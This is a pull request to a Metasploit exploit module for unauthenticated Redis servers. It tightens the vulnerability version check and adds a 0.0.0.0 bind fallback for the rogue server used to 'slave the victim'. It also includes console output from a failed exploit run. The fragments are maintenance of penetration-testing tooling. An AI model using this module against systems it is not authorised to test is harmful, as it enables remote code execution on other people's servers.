### PR TITLE
Minor fix in redis exploit module.

### DIFF
--- a/modules/exploits/linux/redis/redis_unauth_exec.rb
+++ b/modules/exploits/linux/redis/redis_unauth_exec.rb
@@ -79,7 +79,19 @@ class MetasploitModule < Msf::Exploit::Remote
       report_redis(redis_version)
     end
 
-    Exploit::CheckCode::Vulnerable
+    unless redis_version
+      print_error("Cannot retrieve redis version, please check it manually")
+      return Exploit::CheckCode::Unknown
+    end
+
+    # Only vulnerable to version 4.x or 5.x
+    version = Gem::Version.new(redis_version)
+    if version >= Gem::Version.new('4.0.0')
+      vprint_status("Redis version is #{redis_version}")
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
   ensure
     disconnect
   end
@@ -145,8 +157,15 @@ class MetasploitModule < Msf::Exploit::Remote
   # We pretend to be a real redis server, and then slave the victim.
   #
   def start_rogue_server
-    socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport})
-    print_status("Listening on #{srvhost}:#{srvport}")
+    begin
+      socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport})
+      print_status("Listening on #{srvhost}:#{srvport}")
+    rescue Rex::BindFailed
+      print_warning("Handler failed to bind to #{srvhost}:#{srvport}")
+      print_status("Listening on 0.0.0.0:#{srvport}")
+      socket = Rex::Socket::TcpServer.create({'LocalHost'=>'0.0.0.0', 'LocalPort'=>srvport})
+    end
+
     rsock = socket.accept()
     vprint_status('Accepted a connection')
 


### PR DESCRIPTION
Sometimes when I run the rogue server behind the NAT network or  Balanced Loader, the server would raise an error and fail. Fix it and now it would fall into binding on `0.0.0.0`.

And enhance the accurate of the `check` method.

```
msf5 exploit(linux/redis/redis_unauth_exec) > exploit 

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] 127.0.0.1:6379        - Compile redis module extension file
[+] 127.0.0.1:6379        - Payload generated successfully! 
[-] 127.0.0.1:6379        - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (192.168.3.1:6379).
[*] Exploit completed, but no session was created.

```

Fixes #12107.